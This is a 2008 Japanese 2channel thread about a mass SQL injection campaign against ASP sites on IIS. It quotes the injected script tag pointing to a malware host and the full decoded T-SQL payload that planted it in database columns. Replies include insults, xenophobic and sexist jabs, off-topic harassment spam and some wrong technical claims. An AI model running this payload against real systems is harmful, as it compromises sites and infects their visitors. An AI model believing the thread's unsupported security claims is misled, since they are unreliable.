２ちゃんねる ■掲示板に戻る■ 全部 1- 最新50 [PR]レンタルサーバ価格比較[PR]

【ネット】50万サイト以上の『IIS』サーバーがサイバー攻撃の影響下に［08/04/25］

1 ：やるっきゃ騎士φ ★：2008/04/26(土) 15:09:45 ID:???: 脆弱性を抱える Microsoft の Web サーバー『Internet Information Services』(IIS) を用いた
Web サイトが、大規模なサイバー攻撃の対象となっている。サイトの訪問者を、
悪質コードのあるサイトにリダイレクトする手口で、被害が急増している。

最初に被害のまん延を検出したセキュリティ会社 Panda Security は、その時点で影響を受けた
IIS サーバーを28万2000台と発表していた。F-Secure もそれから1日と経たずに、
同社の公式 Blog の中で、まん延規模について51万サイトを超えると発表した。

今回の攻撃でもっとも厄介なことは、影響を受けたすべての Web サイトが見た目にはまったく
問題なく、改ざんコードが正規の Web ページ内にあることだ。コードを仕込まれたサイトでは、
IFRAME を用いたリダイレクトにより、訪問者は別のページに移動させられてしまう。
移動先には、ID 情報窃盗用の悪質コードが待ち受け、リダイレクトされた訪問者の
コンピュータにダウンロードされる。そのため、問題のないサイトを閲覧していると思って
いても、危険な状態にさらされていることになる。

Panda Security で企業向け主任エバンジェリストを務める Ryan Sherstobitoff 氏は、
次のように語った。「以前は、インターネットの影の部分に足を踏み入れることで、
感染する確率が高くなると思われていた。だが今日では、問題のある領域に行かずとも、
攻撃を受けてしまう。インターネットの良識ある部分を利用していても、感染することが
あり得る」

IIS に存在する問題の脆弱性は、正規 Web サイトを操作するための SQL コード挿入を攻撃者に
許してしまう。このコードは、訪問者を悪質サイトにリダイレクトするための IFRAME
を追加し、餌食となった訪問者のコンピュータをスキャンして、脆弱性がないか調べる。
そして、その訪問者の防御手段を潜り抜けることができる悪質コードを、コンピュータに
ダウンロードしてしまう。

この問題は IIS だけに生じるもので、『Apache』を含む他の Web サーバーには発生しない。
Sherstobitoff 氏によれば、報道などから Microsoft はこの問題を把握しているようだと
述べている。一方、問題の修正がいつ頃になるのかについて Microsoft に問い合わせたが、
本稿執筆時点までに回答は得られなかった。

Sherstobitoff 氏は、特に政府および公共サイトなどを中心に、米国に対する攻撃が最もひどい
と語り、「攻撃者は犠牲者が出ることならば、何でも構わないのだ」と説明した。

Panda Security と F-Secure は共に、Web サイトに隠蔽された悪意のあるコードが、
リダイレクトを行なうことを確認済みだ。各サイトの管理者は、自分の Web サイト内に
「<script src=http://www.nihaorr1***>」(***部分は伏せ字) というコードが仕込まれて
いないか確かめるべきだ。

ソースは
http://headlines.yahoo.co.jp/hl?a=20080425-00000011-inet-secu
依頼を受けてたてました。
2 ：名刺は切らしておりまして：2008/04/26(土) 15:10:52 ID:kbi66vvf: 犯人は中国人
3 ：名刺は切らしておりまして：2008/04/26(土) 15:17:20 ID:JTa9+5Fh: いつもの事だな

そして、俺んちにバイアグラのメールが届くって分けだな
4 ：名刺は切らしておりまして：2008/04/26(土) 15:21:01 ID:JTa9+5Fh: Windowsなんて無くなればいいのにな
5 ：名刺は切らしておりまして：2008/04/26(土) 15:23:09 ID:QxTIasXp: 貧乏人にはリナックス
6 ：名刺は切らしておりまして：2008/04/26(土) 15:23:24 ID:MAw0Wbkc: Apache使えばええやん
7 ：名刺は切らしておりまして：2008/04/26(土) 15:23:51 ID:q/X7x/Li: windowsサーバをインターネットで公開するなんて
女がスカートとパンツをはかずに埼京線に乗るようなもの
8 ：名刺は切らしておりまして：2008/04/26(土) 15:25:27 ID:6+edNLh0: 原因を作ったやつが悪いと言うのなら
すべてはノイマンが悪いことになるが
9 ：名刺は切らしておりまして：2008/04/26(土) 15:27:43 ID:JTa9+5Fh: ここにアクセス

http://209.85.175.104/search?q=cache:wttGG5bUFekJ:www.ihlondon.jp/+script+src%3Dhttp://www.nihaorr1&hl=ja&ct=clnk&cd=1&gl=jp&lr=lang_ja&client=firefox
10 ：名刺は切らしておりまして：2008/04/26(土) 15:28:49 ID:JTa9+5Fh: これが組み込まれるんだね
<script src=http://www.nihaorr1.com/1.js></script>
11 ：名刺は切らしておりまして：2008/04/26(土) 15:37:16 ID:hMCXvS9G: うちの会社で、Iframeでウイルスがなぜか配られてる顧客のHPが見つかって
不正攻撃でサーバー乗っ取られた！！って心配してログ見たけど全然問題なし

該当のファイルは普通のアカウントで正規のログインID,PASSで入ってアップロードしてただけ。
で、そのID,PASS持ってる顧客に聞いたけど、「知らない、その時間帯は何もしてない」っていうし。

？？と思ってFTPサーバーのログもう一回みたら、その顧客(日本在住)のID使ってきたやつのIPがアメリカのサーバーだった。
どうやら、サーバーじゃなくて、顧客のパソコンが乗っ取られてFTPアカウント抜かれてたみたい＞＞ID,PASS手に入れたそいつは
平然とサーバーにログイン＜＜正当なID,PASSなので当然認証通る。で、ウイルスコード仕込んだ”普通の”htmlファイルをアップロードしたようだ。
↑こんな高等なことはただのワームとかじゃできない。どっかの人間が顧客のパソコンを遠隔から自由に操作できる状態にして
ID,PASSを見つけたようだ。

いくらサーバーが対策しても、スパイウェア監視もしてないパソコンが1台でもあってそいつがHP運営してたら防げんね。
12 ：名刺は切らしておりまして：2008/04/26(土) 15:39:02 ID:wQaUiPBd: IIS使ってんだから別にいーだろ
攻撃されたらその対応に一々金出してくれて、天下のマイクロソフトを
選定したことには文句の一つもいわない金ズル専用のツールなんだから。
13 ：名刺は切らしておりまして：2008/04/26(土) 15:58:13 ID:poEhB4ZA: ビズ+のバカオヤジのMS擁護ﾏﾀﾞｰ？（･∀･)っ/凵⌒☆ﾁﾝﾁﾝ　ﾏﾁｸﾀﾋﾞﾚﾀｰ
14 ：名刺は切らしておりまして：2008/04/26(土) 16:23:12 ID:YttVEeju: Apache+mod_jk使っとけ
どうしてもASPがいいならMonoという手段もある
15 ：名刺は切らしておりまして：2008/04/26(土) 18:41:52 ID:/N31XE6Y: nihaorr1 でググると凄いことになってるな。
ほとんどがasp,aspxなのがマヌケｗ
16 ：名刺は切らしておりまして：2008/04/26(土) 20:12:05 ID:OHSGuKzC: サウンドハウスの流出もこれが原因だろ。
17 ：名刺は切らしておりまして：2008/04/26(土) 23:34:03 ID:6vZqsJ16: またaspページを狙ったSQLインジェクションみたいだが
正規表現で入力フォームのサニタイズしてない所がやられてる？
http://forums.iis.net/t/1148917.aspx
18 ：名刺は切らしておりまして：2008/04/26(土) 23:56:32 ID:iRZQraGY: >>7
＞windowsサーバをインターネットで公開するなんて
　女がスカートとパンツをはかずに埼京線に乗るようなもの

逆に恐くて近付けない様な…。
19 ：名刺は切らしておりまして：2008/04/26(土) 23:58:14 ID:spX4kL6V: 　　_▲▼▲▲_
　/
./
.|・　　　　・　　　　ホスト坊やだよ。エコでホラ吹きヤクザだよ
.|　　〇　　　　　　親と一緒。車の名義も親エコで親名義だよ　
　----------- ● 　　　けどサイトは立派のエコ坊やのホスト坊やサイトだよ
.　＼__________/ 　日本中の親分から信頼されている天一ホラ吹き坊やのヤクザだよ

ホラ吹きホスト坊や。ホラ吹きホスト坊や。相模原ヤクザ怖い。助けて～おまわりさん
通報URL：http://school7.2ch.net/test/read.cgi/lic/1208881544/838
参照番号：　1209217482-1163
2008年4月26日 22:44:42
インターネット・ホットラインセンター
投資信託なんか米国ITバブルのとき解約しているがホスト坊やＷ
司法書士になれなかったＡＶストーカー
http://school7.2ch.net/test/read.cgi/lic/1208881544/l50

※こいつも大沢佑香と相模原ヤクザとsoftondemand.jp関係を持つ奴だろう
通報URL：http://softondemand.jp/corporate/
参照番号：　1209218096-1165
2008年4月26日 22:54:55

167 kB (1.656 sec.) [ ２ちゃんねる３億PV/日をささえるレンタルサーバー
20 ：名刺は切らしておりまして：2008/04/27(日) 00:14:11 ID:vOTtcRIQ: よくわからんから
127.0.0.1 www.nihaorr1.com
しておく
21 ：名刺は切らしておりまして：2008/04/27(日) 00:17:54 ID:QWoO61wb: こら！
22 ：名刺は切らしておりまして：2008/04/27(日) 00:18:25 ID:Y7ilVrPa: >>7
Media PlayerのDRMつき動画配信サービスはWindowsサーバが多い。
23 ：名刺は切らしておりまして：2008/04/27(日) 00:51:33 ID:SxrFkEB3: 都合の悪いスレは完全スルーか。
24 ：名刺は切らしておりまして：2008/04/27(日) 01:05:12 ID:QWoO61wb: MSはこっそり951306をアナウンスするし、ﾊﾞｶデベロッパは英語わからんからスルーするしなｗ
俺はApacheでもWinの80番ポート開ける勇気はないわ。
ほんと馬鹿ドザって危機感がないね。
25 ：名刺は切らしておりまして：2008/04/27(日) 01:38:35 ID:Rqnk+mic: >>22
MSDRM動画配信は日本じゃMSの下僕のYahooJapanとGyaoが頑張ってるけど
世界的には減ってるよ。それであわててシルバーライトでmacとlinuxに対応しようと
してるけど
26 ：名刺は切らしておりまして：2008/04/27(日) 02:09:00 ID:SxrFkEB3: ほかのスレあげてこのスレ沈める気だな。そうはさせん。
27 ：名刺は切らしておりまして：2008/04/27(日) 02:17:33 ID:nk7jtQuA: マイクロソフトは駄目だな
28 ：名刺は切らしておりまして：2008/04/27(日) 02:41:29 ID:rFtWvVFw: >>15
> ほとんどがasp,aspxなのがマヌケｗ
まあわざわざIIS使おうって所なら、大体ASPサービスだろうなぁ
29 ：名刺は切らしておりまして：2008/04/27(日) 02:47:50 ID:jFwn260s: サポート面からIIS使ってる企業多いし・・・Linux + Apacheにしろ！ってのも担当者のスキル云々もあるし無理な話だろうしなぁ
30 ：名刺は切らしておりまして：2008/04/27(日) 03:03:33 ID:ynLApp8s: つかドットネット使いたいからIISじゃないの。
Linux + Apacheに乗換えとかなったら全部１から作り直しだろ
31 ：名刺は切らしておりまして：2008/04/27(日) 03:30:01 ID:SxrFkEB3: なんでお前ら無反応に近い感じなんだよ。
慣れきっとんのか。サイト書き換えられたりすることに関して。
32 ：名刺は切らしておりまして：2008/04/27(日) 03:37:05 ID:Ybtiuc4Q: 技術者じゃないのでわかりませんってトコだろｗ

まあ俺もその口だが。頑張って啓蒙活動でもしてくれ
33 ：名刺は切らしておりまして：2008/04/27(日) 03:38:59 ID:rFtWvVFw: >>31
去年くらいからこの手の事件は、メディアに大々的に取り上げられないだけで、
山のように起きてるんで、今更感がね
34 ：名刺は切らしておりまして：2008/04/27(日) 03:45:52 ID:QWoO61wb: >>29
無能VBプログラマの失業対策ｗ
サニタイズもプリペアドステートメントも？な連中に穴だらけのブラックボックスサーバ
扱わせれば世界中に迷惑かかるってわかり切ったことじゃんｗｗｗ
サポートといっても対応遅いし、実損出ても責任取るわけないし、もうIIS使ってるとこはVISA/Master使用不可にしとけよｗ
35 ：名刺は切らしておりまして：2008/04/27(日) 03:50:40 ID:HFvJEA0O: どんなにWindowsサーバがたたかれようがVB.NETファンがいる限り支持されるのさ
36 ：名刺は切らしておりまして：2008/04/27(日) 03:51:45 ID:JHWJSU6b: その昔、MS社内はApache/FreeBSDサーバーだらけだった。
WindowsServerのキャンペーンサイトもそうだった。
それを指摘され、WindowsServerに変えたら30分でダウンした。
37 ：名刺は切らしておりまして：2008/04/27(日) 03:56:29 ID:QWoO61wb: あと、ﾊﾞｶデベロッパは巨大なVIEWSTATEをPOSTするのはヤメレ。帯域の無駄だ。
Office何とか機能を付けたIEはアクセスログ汚すし、ほんとMSの製品って世界中で迷惑掛けてるよなｗ
38 ：名刺は切らしておりまして：2008/04/27(日) 04:13:47 ID:i6snr58V: これってIFRAMEで飛ばされないようにセキュリティー設定しとけば
とりあえずリダイレクトは防げるってことだよな
39 ：名刺は切らしておりまして：2008/04/27(日) 04:14:14 ID:4cE6/+bi: >>36
懐かしいな。HotmailもFreeBSDだったよね。今もそうなのかな。
M$が手を伸ばしているYahoo!もFreeBSDだし、好きなのかね？
40 ：名刺は切らしておりまして：2008/04/27(日) 04:25:50 ID:O0fpZjz+: .NETってなんなの。MSNにアカウントもっているけど、いったい何の仕組みかさぱりわからない。
メッセンジャーとかのインフラ？
41 ：名刺は切らしておりまして：2008/04/27(日) 04:29:11 ID:YDLum8Sq: >>39

Linuxよりは設計が綺麗だから好きなんじゃないの？
42 ：名刺は切らしておりまして：2008/04/27(日) 05:34:20 ID:LKq3VpRH: IISて・・・・自業自得ですよ・・・
43 ：名刺は切らしておりまして：2008/04/27(日) 06:26:34 ID:/nXYaY+r: Webサイトの改ざん攻撃が拡大、世界で数十万ページが被害
SQLインジェクション攻撃で不正コードを仕掛けられたページは数十万に上るという。
http://www.itmedia.co.jp/enterprise/articles/0804/25/news020.html
44 ：名刺は切らしておりまして：2008/04/27(日) 06:30:22 ID:PBGz/J7t: こういったときに、VistaのIE7の保護モード役に立つな
VistaのIE7の保護モードならへんなサイトふんでも余裕で生還
45 ：名刺は切らしておりまして：2008/04/27(日) 06:35:58 ID:dEy+Cqfe: ●469 ：名刺は切らしておりまして：2008/02/22(金) 21:57:41 ID:lOshWS43
>>468
東京を敵に回さない方が君たちの身のためだよ。
すべての報道機関握ってるから、マスコミ使えば国民世論は東京の政策に味方するさ。
オリンピック候補地の件で歯向かってきた福岡が、あれ以来急にマスコミに叩かれだしたの記憶に新しいだろ。
歯向かう奴はああなる。
マスコミだけじゃない、各官庁を通じて自治体を痛い目に遭わせることだって出来る。
－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－
●471 ：名刺は切らしておりまして：2008/02/22(金) 22:14:57 ID:lOshWS43
企業は実力と思ってるのは関西人の頭い悪い証拠。
実力なくても実績なくても、東京マスコミと官僚とのコネで、いくらでも「優良企業」という幻想つくることできる。
資本主義なんて所詮こんなもの。関西で下らない努力するより、勝ち残りたければ東京にヘッド（企業本社）移せよ。
－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－
●473 ：名刺は切らしておりまして：2008/02/22(金) 22:29:18 ID:lOshWS43
都民で青学レベル以上の大卒なら、額に汗して働かなくても一定の生活できる。
月収４０万は手堅い。資本一極集中のおかげ。将来もっと東京に資本・情報が集中する。地方は百姓と工場労働者だけになる。そろそろ、地方は東京の奴隷だってこと悟った方が良さそうだけど
46 ：名刺は切らしておりまして：2008/04/27(日) 06:56:12 ID:e3hpip9g: そこでapacheのIIS互換ライブラリですよｗｗｗ
今まともなのあるのかな？　うちの会社は結局内製して使ってるけど・・・
47 ：名刺は切らしておりまして：2008/04/27(日) 09:35:53 ID:FL00iI/C: このセキュリティホールのせいで大損害受けたトレンドマイクロとかサウンドハウス
は、MSに賠償請求したほうがいいな
48 ：名刺は切らしておりまして：2008/04/27(日) 10:00:02 ID:xEp1wKZB: http://ﾆｰﾊｵｗｗｗ
49 ：名刺は切らしておりまして：2008/04/27(日) 12:07:42 ID:OX1q2Thw: >>1

やばいだろ、これ
50 ：名刺は切らしておりまして：2008/04/27(日) 12:08:43 ID:111mudpJ: FUDって奴か。
51 ：名刺は切らしておりまして：2008/04/27(日) 14:23:01 ID:/nXYaY+r: ネット時代のスパイ活動、発信源は中国にあり
サイバー攻撃が激増、標的は政府機関や防衛関連企業
http://business.nikkeibp.co.jp/article/world/20080418/153470/
52 ：名刺は切らしておりまして：2008/04/27(日) 16:38:51 ID:SxrFkEB3: すげーなサウンドハウスって防衛関連企業だったんだな。
53 ：名刺は切らしておりまして：2008/04/27(日) 18:05:37 ID:BDayF1j3: >>47 つーかまともな会社ならIIS使うのが馬鹿だろ。
　　　Solaris+Apacheにしろよ。
54 ：名刺は切らしておりまして：2008/04/27(日) 19:43:04 ID:IUok/e0M: >>53
古代人の発想だな
55 ：名刺は切らしておりまして：2008/04/27(日) 20:14:23 ID:Rqnk+mic: 実際>>1のような問題があるしな。イントラならともかく外部向けでIISは無いわ
56 ：名刺は切らしておりまして：2008/04/27(日) 20:15:23 ID:BDayF1j3: >>54 Windowsしか出来ない馬鹿は黙ってろ
57 ：名刺は切らしておりまして：2008/04/27(日) 21:23:42 ID:/rExwgUB: >>54
現代人のお薦めは？
58 ：名刺は切らしておりまして：2008/04/27(日) 22:20:53 ID:SxrFkEB3: >>57
Windows 7
59 ：名刺は切らしておりまして：2008/04/27(日) 22:25:58 ID:GEvSKqi4: >>58
確かに安全なWindowsって、存在しないWindowsだけだからな。
60 ：名刺は切らしておりまして：2008/04/27(日) 22:30:18 ID:oTVI9J33: IISにSQLの機能なんてデフォルトで統合されてたっけ？
61 ：名刺は切らしておりまして：2008/04/27(日) 22:44:56 ID:oTVI9J33: IISとSQL Server全然関係ないだろこれと思って記事の元になってるblog見たら
http://www.f-secure.com/weblog/archives/00001427.html

UPDATE: We've been receiving some questions on the platform and operating systems affected by this attack.
So far we've only seen websites using Microsoft IIS webserver and Microsoft SQL Server being hit.
Do note that this attack doesn't use any vulnerabilities in any of those two applications.
What makes this attack possible is poorly written ASP and ASPX (.net) code.

IISとSQL Server別に関係ないよって書いてあるな
62 ：名刺は切らしておりまして：2008/04/27(日) 22:52:20 ID:1JayqUAs: >>61
SQLインジェンクションじゃないとしたら、aspコードが走るIISへのゼロデイアタックってことだろ。
そっちの方が怖いわｗ
63 ：名刺は切らしておりまして：2008/04/27(日) 22:57:09 ID:oTVI9J33: >>62
お前英語読めないのか？
64 ：名刺は切らしておりまして：2008/04/27(日) 23:01:56 ID:Rqnk+mic: というか英文にはしょぼいASPコードのせいって書いてあるが
65 ：名刺は切らしておりまして：2008/04/27(日) 23:17:44 ID:/rExwgUB: http://forums.iis.net/t/1148917.aspx

decoding that binary data which is cast to a varchar yields this:

DECLARE @T varchar(255)'@C varchar(255) DECLARE Table_Cursor CURSOR FOR
select a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and
a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO
@T'@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set
['+@C+']=rtrim(convert(varchar'['+@C+']))+''<script src=nihaorr1.com
/1.js></script>''')FETCH NEXT FROM Table_Cursor INTO @T'@C END
CLOSE Table_Cursor DEALLOCATE Table_Cursor
66 ：名刺は切らしておりまして：2008/04/27(日) 23:23:22 ID:IUok/e0M: >>57
現代人の選択は自分のニーズを満たすアプリケーションがもっともよく
稼動実績を持つプラットフォーム。

いまさらApacheがとかIISがとか、低レベル議論する時点で古代人。
通常ニーズの範囲内ですでに差はない。あるとしたら単に使いこなし能力の
差でしかない。

そんな所の差がどうたら、コストがどうたら言う前に、問題のアプリを
フル活用して稼動させることで得られるメリットを最大化するほうに
脳味噌は使ったほうがいい。
67 ：名刺は切らしておりまして：2008/04/27(日) 23:28:49 ID:/rExwgUB: （　´_ゝ`）ﾌｰﾝ
68 ：名刺は切らしておりまして：2008/04/27(日) 23:35:22 ID:fp1tf25d: ブラックボックスの部分が大きく、挙動が把握出来なくなる恐れのある
IISは怖くて使えないな。
69 ：名刺は切らしておりまして：2008/04/27(日) 23:40:57 ID:/rExwgUB: こんなもんこっそり出さずに翻訳して表示してやれよ。　全く危機感なしｗｗｗ
http://support.microsoft.com/kb/951306/ja
70 ：名刺は切らしておりまして：2008/04/27(日) 23:44:22 ID:Y6Gb33Tk: >>69
結局そういう隠ぺい体質も含めてブラックボックスなんだよな。。。
71 ：名刺は切らしておりまして：2008/04/27(日) 23:48:52 ID:BDayF1j3: ゴミをありがたがって使うのがWindowsユーザ。

技術者とは呼べないな。
72 ：名刺は切らしておりまして：2008/04/27(日) 23:52:27 ID:/rExwgUB: >>70
ユーザー側も(∩゜д゜)ｱｰｱｰ聞こえない状態だし。
ASPｽﾚとかSQLServerｽﾚとか平和なものだしｗ
73 ：名刺は切らしておりまして：2008/04/27(日) 23:55:44 ID:EDZilwIW: Win 2008 Server買えばOK
74 ：名刺は切らしておりまして：2008/04/28(月) 09:57:14 ID:18An2j8X: そうやってMSは旧OSを陳腐化させていくわけねｗ
75 ：名刺は切らしておりまして：2008/04/30(水) 19:17:21 ID:YiVLsRZS: 素人で申し訳ない
アホ板掲示板で株広告サイトがウザイんです
セコくタダで嵐して貼りまくり
攻撃法教えて下さい
76 ：名刺は切らしておりまして：2008/04/30(水) 19:24:02 ID:ppwDHna3: >>75
ます、SEになってそのサイトをIISで運用するよう提案することからだなｗ
77 ：名刺は切らしておりまして：2008/05/01(木) 03:23:27 ID:Jy/6VDwF: ますます酷くなるな。　IIS使う馬鹿な企業はさっさと潰れれ
78 ：名刺は切らしておりまして：2008/05/01(木) 16:51:06 ID:evfY+UHB: 訴えれ
79 ：名刺は切らしておりまして：2008/05/01(木) 17:24:13 ID:bzaQdXLr: 「ホワイトハウスが500万通の電子メールを紛失、原因はメールシステムの移行」

クリントン政権の下ではこの法令を満たすようLotus Notesで電子メールの自動分類及び
保存が行われていたとのこと。このシステムはメールが改変されたり削除されたりしない
ためのセーフガードも備えていたという。

しかしブッシュ政権がMicrosoft Outlook and Exchangeへの移行を決めたため、ホワイト
ハウスはメールをソートし、.pstファイルにする作業をマニュアルで行うことにしたそうだ。
人の手による作業であったため、該当メールが正しく保存されなかったり、複数のサーバに
分かれて保存されたりし、結果として500万通ものメールの行方が分からなくなってしまっ
たらしい。

http://arstechnica.com/articles/culture/bush-lost-e-mails.ars
80 ：名刺は切らしておりまして：2008/05/01(木) 17:53:37 ID:Jy/6VDwF: 馬鹿だ。さすが元祖猿大統領！！
81 ：名刺は切らしておりまして：2008/05/01(木) 18:03:06 ID:58Al14t5: SQLインジェクションの脆弱性があるウェブサイトが50万あるってどうやって調べたんだろう。
82 ：名刺は切らしておりまして：2008/05/01(木) 18:14:19 ID:S/Ld5zUs: >>81
原因はSQLインジェクションじゃなくて、IIS+MS SQLの組み合わせ時に出来るセキュリティホールってことじゃね
83 ：名刺は切らしておりまして：2008/05/01(木) 18:25:27 ID:58Al14t5: MS SQLServerなんてどこにも書いてないよ。それに外部からどんなDBサーバを使っているのか調べることなんて基本的に不可能だろ。
そもそもSQLインジェクションに成功したとしても、それで確実にページ書き換えできるわけじゃない。
出力前にエスケープ処理を通ってるかどうかを外部から判断できるわけない。
なんかこの記事、おかしい。
84 ：名刺は切らしておりまして：2008/05/01(木) 18:32:15 ID:k1zOPbG2: >>83

http://www.microsoft.com/technet/security/advisory/951306.mspx
85 ：名刺は切らしておりまして：2008/05/01(木) 18:32:44 ID:8NslHxXl: >>65みたいなT-SQLが通ってしまうということはユーザ権限をしっかり管理してないﾊﾞｶデベロッパばかりということだなｗ
低レベルのOSにはそれに見合った開発者しかいないということｗｗｗ
86 ：名刺は切らしておりまして：2008/05/01(木) 20:51:40 ID:6rEuXyRJ: >>79
Windows鯖は何やらせてもダメだな。
87 ：名刺は切らしておりまして：2008/05/02(金) 00:08:20 ID:/v6R2xES: >>79
サルすぎる・・・。
88 ：名刺は切らしておりまして：2008/05/02(金) 00:52:00 ID:3FG7QaaF: これは素晴らしい”選択と集中”ですね。
89 ：名刺は切らしておりまして：2008/05/02(金) 01:43:10 ID:7T1xHcMI: ApachとかLighttpじゃだめなのか？
90 ：名刺は切らしておりまして：2008/05/02(金) 06:30:18 ID:cIrPfd5Z: >>84それ関係ないよ。
SQLインジェクションというのは、エスケープしそこねたSQLを実行することで引き起こされる脆弱性だから。
どんな言語、どんなサーバを使っていても起こりうる問題で、ウェブサイトデベロッパーに責任がある。
1-2年前に価格コムが同様の攻撃を受けたけど、あそこはApache+Perlだけど、別にApacheに責任があるわけじゃない。
スタックオーバーフローなんかを使った攻撃に対する脆弱性とは別種の問題だ。
91 ：名刺は切らしておりまして：2008/05/02(金) 06:53:37 ID:w7iUBvTC: >>90
さらっと嘘つくなよｗ　あの事件前、価格.comは混雑してるときSQLServerのタイムアウトエラーメッセージを吐いてたぞ。

HTTP/1.x 200 OK
Content-Length: 11931
Content-Type: text/html
Content-Encoding: gzip
Content-Location: http://kakaku.com/index.html
Server: Microsoft-IIS/6.0
92 ：名刺は切らしておりまして：2008/05/02(金) 07:15:55 ID:ubAESn5J: Apatch＋MySQLならSQLインジェクションなんて有り得ないのに
いまだにIIS＋SQLサーバーとかﾃﾗﾊﾞﾛｽwww
93 ：名刺は切らしておりまして：2008/05/02(金) 07:39:52 ID:TY4R2Dmo: >>90
>価格コムが同様の攻撃を受けたけど、あそこはApache+Perl

嘘つくな
http://uptime.netcraft.com/up/graph?site=http://kakaku.com/
94 ：名刺は切らしておりまして：2008/05/02(金) 07:44:49 ID:hepysK/1: IISは今も昔もうんこ
95 ：名刺は切らしておりまして：2008/05/02(金) 14:53:29 ID:DWNecBP5: さらしage
96 ：名刺は切らしておりまして：2008/05/02(金) 20:49:38 ID:NfAardYo: >>90
>あそこはApache+Perlだけど

それどこで受信した電波情報？
97 ：名刺は切らしておりまして：2008/05/02(金) 23:18:35 ID:Yvt3ER+d: >>90
結局こいつトンズラ？
98 ：名刺は切らしておりまして：2008/05/02(金) 23:44:05 ID:bm+g0NTC: さすがブラックボックスをありがたく奉るマンチキンw
Winでサーバ立てるﾊﾞｶってどうせ大口叩く割には１本抜けてるから、大穴開けてクラックされるんだろなw
99 ：名刺は切らしておりまして：2008/05/02(金) 23:45:06 ID:bm+g0NTC: おっと晒しageとかなきゃwww
100 ：名刺は切らしておりまして：2008/05/02(金) 23:47:13 ID:LY7Ak+Ez: ただいまcIrPfd5Zは時計の針が0時を回るのを息を潜めて待っておりますｗ
101 ：名刺は切らしておりまして：2008/05/02(金) 23:47:32 ID:+HiiLoIv: >>92
別にapacheでもmysqlでも、原理上「SQLインジェクション」というのは、
起こりうるものだと思うんですが。まあ原理を考えれば当たり前のことだけど。
この問題、俺は、Win鯖を扱う技術者のレベルが低すぎるせいで引き起こされているかと
思うんだよな。
コボラー上がりのVB厨とか、ほんとヤバイからなｗｗｗ
102 ：名刺は切らしておりまして：2008/05/03(土) 00:02:47 ID:fU/iy2um: >>101
> コボラー上がりのVB厨とか
コボラーはCOBOL以外で使用するのは危険過ぎる…
103 ：名刺は切らしておりまして：2008/05/03(土) 00:31:12 ID:EQBfhEuN: 業界でWindowsべったりなのコボラー上がりが多いよな。
コボラーは所詮使い捨ての部品
104 ：名刺は切らしておりまして：2008/05/03(土) 00:39:51 ID:aG/GHUVM: アイアイアイアイ
アイアイアイアイオ
さーるさーんだよ～～～
105 ：名刺は切らしておりまして：2008/05/03(土) 01:23:16 ID:f+8gVYhm: >>103
言語の概念も仕様も全然違うのに、コボルの流儀を持ち込もうとするからなｗｗ
なんでだろうな。
106 ：名刺は切らしておりまして：2008/05/03(土) 01:31:28 ID:m/hRWYJv: MS嫌いの技術者も困るが、MS製品しか扱えない技術者はもっとたちが悪い
107 ：名刺は切らしておりまして：2008/05/03(土) 02:34:48 ID:zzKR001o: これって…あんまりネットサーフィンしない方がいいって事かな修正されるまで
108 ：名刺は切らしておりまして：2008/05/03(土) 02:39:54 ID:NpfRAfP/: >>107
少なくともIE使うのはやめたほうがいいじゃね
109 ：名刺は切らしておりまして：2008/05/03(土) 12:56:05 ID:CUJnUHIl: >>90
>>>84それ関係ないよ。
>SQLインジェクションというのは、エスケープしそこねたSQLを実行することで引き起こされる脆弱性だから。
>どんな言語、どんなサーバを使っていても起こりうる問題で、ウェブサイトデベロッパーに責任がある。
>1-2年前に価格コムが同様の攻撃を受けたけど、あそこはApache+Perlだけど、別にApacheに責任があるわけじゃない。
>スタックオーバーフローなんかを使った攻撃に対する脆弱性とは別種の問題だ。

ヴァカ？
110 ：名刺は切らしておりまして：2008/05/03(土) 12:58:32 ID:+LfhR8+s: 必死で中国人が粉塵爆発を否定してるな
111 ：名刺は切らしておりまして：2008/05/03(土) 13:19:13 ID:ZoHWkFrm: このスレに沸いてる８割くらいの奴と一緒に仕事したくないなと思った今日この頃。
112 ：名刺は切らしておりまして：2008/05/03(土) 13:23:59 ID:hi3p0NhA: >>111
そりゃあ、ApacheとIISの区別もつかない知ったかと仕事したらトラブル確定だからな。。。
113 ：名刺は切らしておりまして：2008/05/03(土) 19:08:06 ID:mzh3izPy: >>112
そんな池沼いるのかよ、、、と思ったら上にいたｗ
114 ：名刺は切らしておりまして：2008/05/03(土) 21:22:36 ID:HMUoAMC0: インターヌットというよくわからんもん使うからこうなるんや！
やっぱり伝書鳩が1番安全
115 ：名刺は切らしておりまして：2008/05/03(土) 23:41:16 ID:r3MJtrKb: ネタかと思ったらまじかよ
116 ：名刺は切らしておりまして：2008/05/03(土) 23:55:04 ID:75q6UTc8: 貧乏企業はIIS
117 ：名刺は切らしておりまして：2008/05/04(日) 11:36:48 ID:xCZSypMO: 穴だらけｸｽﾞデベロッパ皿仕上げｗ

http://www.google.co.jp/search?q=nihaorr1
nihaorr1 の検索結果約 273,000 件
118 ：名刺は切らしておりまして：2008/05/04(日) 12:24:19 ID:DCxlyLxn: 暫らくwebの仕事から離れてるけど、10年くらい前はネスケの鯖使ってたな～。

当時のwindowsはデスクトップPCくらいしか使い道が無いイメージだった。

あの頃よりはマシになってるんじゃまいか？
119 ：名刺は切らしておりまして：2008/05/04(日) 15:51:49 ID:/6iMfE3W: 全然
120 ：名刺は切らしておりまして：2008/05/04(日) 20:07:47 ID:PFmD8Daw: むしろ悪くなってる
121 ：名刺は切らしておりまして：2008/05/04(日) 20:23:08 ID:5yhtYFSx: NTの頃はシンプルだし安定してたんだけどな。2003サーバは
意味不明のハングアップするからコマメに再起動しなきゃならんし
この前なんか共有フォルダにアクセスしたら再起動したぞ
122 ：名刺は切らしておりまして：2008/05/04(日) 20:30:16 ID:jD96RpZs: そうか？　ファイルサーバとADのDCとしてしか使わず、WinUpdateをオフにしておけば１年くらい再起動なしで稼働してるけどな。
ただし、TCPポートを絶対外向けに開けないこと。IISだろうがApacheだろうがWinでポートを晒すのは自殺行為w
123 ：名刺は切らしておりまして：2008/05/04(日) 20:58:00 ID:NOOnoPRB: そりゃただのNASだろw
124 ：名刺は切らしておりまして：2008/05/04(日) 21:15:30 ID:DBj1YgOw: だから外向きのサーバには向いていないのだろ。

Fsecureのアンチウイルスサーバがファイル共有型から
Web経由になったとき一寸だけだけIISですぐApacheベースになったよ。

